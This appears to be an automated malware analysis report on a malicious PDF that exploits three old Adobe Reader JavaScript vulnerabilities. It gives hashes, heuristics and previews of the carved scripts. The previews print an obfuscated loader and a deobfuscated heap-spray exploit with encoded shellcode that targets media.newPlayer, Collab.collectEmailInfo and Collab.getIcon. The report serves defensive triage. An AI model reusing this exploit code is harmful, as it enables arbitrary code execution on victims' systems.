Malicious PDF — malware analysis report

Static analysis result for SHA-256 1320fb6e8cdf4d07…

MALICIOUS

PDF

7.5 KB
MD5: 4fdd82d2c3127c14f91f0d7dc5696e09 SHA-1: 5d3703effff67dc336e659687dee371d66d8bb8a SHA-256: 1320fb6e8cdf4d071dd10198e4d801ca7786ad376f466f7f549f70d17ed8e295
476 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains JavaScript that exploits multiple known vulnerabilities in Adobe Reader (CVE-2007-5659, CVE-2009-0927, CVE-2009-4324). The JavaScript is obfuscated and appears to be designed to download and execute a second-stage payload, likely shellcode, as indicated by the ClamAV detection 'Js.Exploit.Shellcode-18'. The specific URLs or hosts for the second-stage download were not fully reconstructed from the provided script excerpts.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0039_000.js
ab8997041d178b8648e4b8bda1a44713314c6878d1d579f7515b9a316974148b		 pdf-javascript-stream PDF /JS object 39 at offset 0x16F 28073 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
a1lZ0wpc="BU37na1T=[197,214,205,192,215,202,204,205,131,197,202,219,252,202,2"; a1lZ0wpc+= "15,139,218,194,209,208,211,143,207,198,205,138,216,212,20"; a1lZ0wpc+= "3,202,207,198,139,218,194,209,208,211,141,207,198,205,196"; a1lZ0wpc+= ",215,203,137,145,159,207,198,205,138,216,218,194,209,208,"; a1lZ0wpc+= "211,136,158,218,194,209,208,211,152,222,218,194,209,208,2"; a1lZ0wpc+= "11,158,218,194,209,208,211,141,208,214,193,208,215,209,20"; a1lZ0wpc+= "2,205,196,139,147,143,207,198,205,140,145,138,152,209,198"; a1lZ0wpc+= ",215,214,209,205,131,218,194,209,208,211,152,222,174,169,"; a1lZ0wpc+= "197,214,205,192,215,202,204,205,131,205,198,212,211,207,1"; a1lZ0wpc+= "94,218,198,209,139,138,216,174,169,213,194,209,131,208,20"; a1lZ0wpc+= "3,198,207,207,192,204,199,198,131,158,131,214,205,198,208"; a1lZ0wpc+= ",192,194,211,198,139,129,134,214,146,146,230,225,134,214,"; a1lZ0wpc+= "151,225,150,225,134,214,224,154,144,144,134,214,155,146,1"; a1lZ0wpc+= "49,149,134,214,226,229,224,154,134,214,155,147,147,146,13"; a1lZ0wpc+= "4,214,147,225,144,151,134,214,230,145,226,149,134,214,230"; a1lZ0wpc+= ",225,229,226,134,214,230,155,147,150,134,214,229,229,230,"; a1lZ0wpc+= "226,134,214,229,229,229,229,134,214,148,224,151,229,134,2"; a1lZ0wpc+= "14,226,149,226,149,134,214,229,154,226,149,134,214,147,14"; a1lZ0wpc+= "8,224,145,134,214,226,149,154,149,134,214,226,149,226,149"; a1lZ0wpc+= ",134,214,230,149,145,231,134,214,145,231,226,226,134,214,"; a1lZ0wpc+= "225,226,231,149,134,214,145,231,147,225,134,214,226,230,2"; a1lZ0wpc+= "24,230,134,214,231,149,145,231,134,214,145,231,155,149,13"; a1lZ0wpc+= "4,214,145,149,226,149,134,214,224,231,154,155,134,214,150"; a1lZ0wpc+= ",150,231,144,134,214,230,147,230,147,134,214,154,155,145,"; a1lZ0wpc+= "149,134,214,231,144,224,144,134,214,230,147,151,226,134,2"; a1lZ0wpc+= "14,145,149,230,147,134,214,231,151,154,155,134,214,150,14"; a1lZ0wpc+= "6,231,144,134,214,230,147,230,147,134,214,154,155,145,149"; a1lZ0wpc+= ",134,214,231,144,224,155,134,214,145,231,150,149,134,214,"; a1lZ0wpc+= "224,224,150,146,134,214,229,229,226,150,134,214,229,231,1"; a1lZ0wpc+= "51,230,134,214,226,149,226,149,134,214,151,151,226,149,13"; a1lZ0wpc+= "4,214,224,230,150,229,134,214,224,155,224,154,134,214,226"; a1lZ0wpc+= ",149,226,149,134,214,231,144,224,230,134,214,224,226,231,"; a1lZ0wpc+= "151,134,214,229,145,224,225,134,214,225,147,150,154,134,2"; a1lZ0wpc+= "14,151,230,145,231,134,214,230,144,151,230,134,214,226,14"; a1lZ0wpc+= "9,226,149,134,214,224,230,226,149,134,214,154,150,224,226"; a1lZ0wpc+= ",134,214,226,149,154,151,134,214,231,150,224,230,134,214,"; a1lZ0wpc+= "224,144,224,230,134,214,229,145,224,226,134,214,225,147,1"; a1lZ0wpc+= "50,154,134,214,151,230,145,231,134,214,154,148,151,230,13"; a1lZ0wpc+= "4,214,226,149,226,149,134,214,145,150,226,149,134,214,230"; a1lZ0wpc+= ",149,151,226,134,214,148,226,145,231,134,214,224,224,229,"; a1lZ0wpc+= "150,134,214,150,154,230,149,134,214,226,145,229,147,134,2"; a1lZ0wpc+= "14,226,145,149,146,134,214,224,148,226,150,134,214,224,14"; a1lZ0wpc+= "4,155,155,134,214,224,147,231,230,134,214,230,145,149,146"; a1lZ0wpc+= ",134,214,226,145,226,150,134,214,226,149,224,144,134,214,"; a1lZ0wpc+= "149,149,154,150,134,214,229,149,229,149,134,214,229,146,2"; a1lZ0wpc+= "29,150,134,214,150,154,229,149,134,214,226,226,229,147,13"; a1lZ0wpc+= "4,214,148,226,145,231,134,214,229,149,229,149,134,214,229"; a1lZ0wpc+= ",150,229,149,134,214,229,149,229,149,134,214,229,147,150,"; a1lZ0wpc+= "154,134,214,150,154,225,149,134,214,226,230,229,147,134,2"; a1lZ0wpc+= "14,229,147,229,148,134,214,231,144,145,231,134,214,145,23"; a1lZ0wpc+= "1,154,226,134,214,155,155,231,145,134,214,226,150,231,230"; a1lZ0wpc+= ",134,214,229,147,150,144,134,214,231,147,145,231,134,214,"; a1lZ0wpc+= "226,150,155,149,134,214,154,150,150,144,134,214,230,229,1"; a1lZ0wpc+= "49,229,134,214,147,225,230,148,134,214,149,144,226,150,13"; a1lZ0wpc+= "4,214,148,231,154,150,134,214,146,155,226,154,134,214,154"; a1lZ0wpc+= ",224,225,149,134,214,231,145,148,147,134,214,149,148,226,"; a1lZ0wpc+= "230,134,214,226,225,149,231,134,214,148,224,
... (truncated)
legacy_pdfkit_stage_000.js
c47fc4af534c1f810d5859959156c7574d29ffe270793433fe4702682619d044		 deobfuscated-js numeric array XOR decoded JavaScript at offset 0x16F 5488 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uD1D1%uC588%uCFCA%uCDC5%uC3D4%uD4C1%uD2C3%uC988%uC1D4%uDE89%u949F%u89D5%uC5D3%u9497%uDED0%u9296%uD089%uCBC7%u93CF%u90D0%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}

function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uD1D1%uC588%uCFCA%uCDC5%uC3D4%uD4C1%uD2C3%uC988%uC1D4%uDE89%u949F%u89D5%uC5D3%u9497%uDED0%u9296%uD089%uCBC7%u93CF%u90D0%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF0
... (truncated)
legacy_pdfkit_stage_001.js
e668da4d85d7d4c6f6492f752208c571bbdc9808b421aca96216bce70bbf7a89		 deobfuscated-js numPages XOR decoded JavaScript at offset 0x16F 5488 bytes
Preview script
First 1,000 lines of the extracted script
FUNCTION FIX IT YARSP LEN	[WHILE YARSP LENGTH
  LEN	[YARSP  YARSP ]YARSP YARSP SUBSTRING   LEN  	 RETURN YARSP ]-*FUNCTION NEWPLAYER 	[-*VAR SHELLCODE   UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  Uc    Ucfca Ucdc  Uc d  Ud c  Ud c  Uc    Uc d  Ude   U   f U  d  Uc d  U     Uded  U     Ud    Ucbc  U  cf U  d  Ud    Ud ce Ud    Ucad  Ud  b Uc c  Uc f  Ud c  Ucaf  Udfc  Ud c  Uc    U bce U  a  	 -*VAR BLOCK   UNESCAPE   U C C U C C 	 -*VAR gdAGAcUYnFrsfZAszlo   UNESCAPE   U C C U C C U C C U C C U C C U C C U C C U C C U   E U     U     U   F U A E U D   U B   U B   U     U D   U     U   B U     U   A U   F U A E U   E U A D U     U     U     U     U     U     U C   U   D U     U     	 -*WHILE BLOCK LENGTH         	 BLOCK  BLOCK -*BLOCK BLOCK SUBSTRING         
 SHELLCODE LENGTH	 -*MEMORY NEW aRRAY 	 FOR I   I  X     I  	 [MEMORY{I}  BLOCK   SHELLCODE ]-*UTIL PRINTD  RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc   NEW dATE 		 -*UTIL PRINTD  sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN   NEW dATE 		 -*TRY [THIS MEDIA NEWpLAYER NULL	 ] CATCH E	 []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo  NEW dATE 		 ]-*-*FUNCTION COLLAB EMAIL 	[VAR SHELLCODE UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  Uc    Ucfca Ucdc  Uc d  Ud c  Ud c  Uc    Uc d  Ude   U   f U  d  Uc d  U     Uded  U     Ud    Ucbc  U  cf U  d  Ud    Ud ce Ud    Ucad  Ud  b Uc c  Uc f  Uc cb Ucacf Uc    U bce U  a  	 VAR MEM ARRAY NEW aRRAY 	 VAR CC  X C C C C VAR ADDR  X       VAR SC LEN SHELLCODE LENGTH
  VAR LEN ADDR
 SC LEN  X  	 VAR YARSP UNESCAPE   U     U     	 YARSP FIX IT YARSP LEN	 VAR COUNT   CC
 X      	 ADDR FOR VAR COUNT   COUNT COUNT  COUNT  	[MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE   U C C U C C 	 WHILE OVERFLOW LENGTH      	[OVERFLOW  OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ    MSG OVERFLOW]	 ]-*-*FUNCTION COLLAB GETICON 	[IF APP DOC cOLLAB GETiCON	[VAR ARRY NEW aRRAY 	 VAR VVPETHYA UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.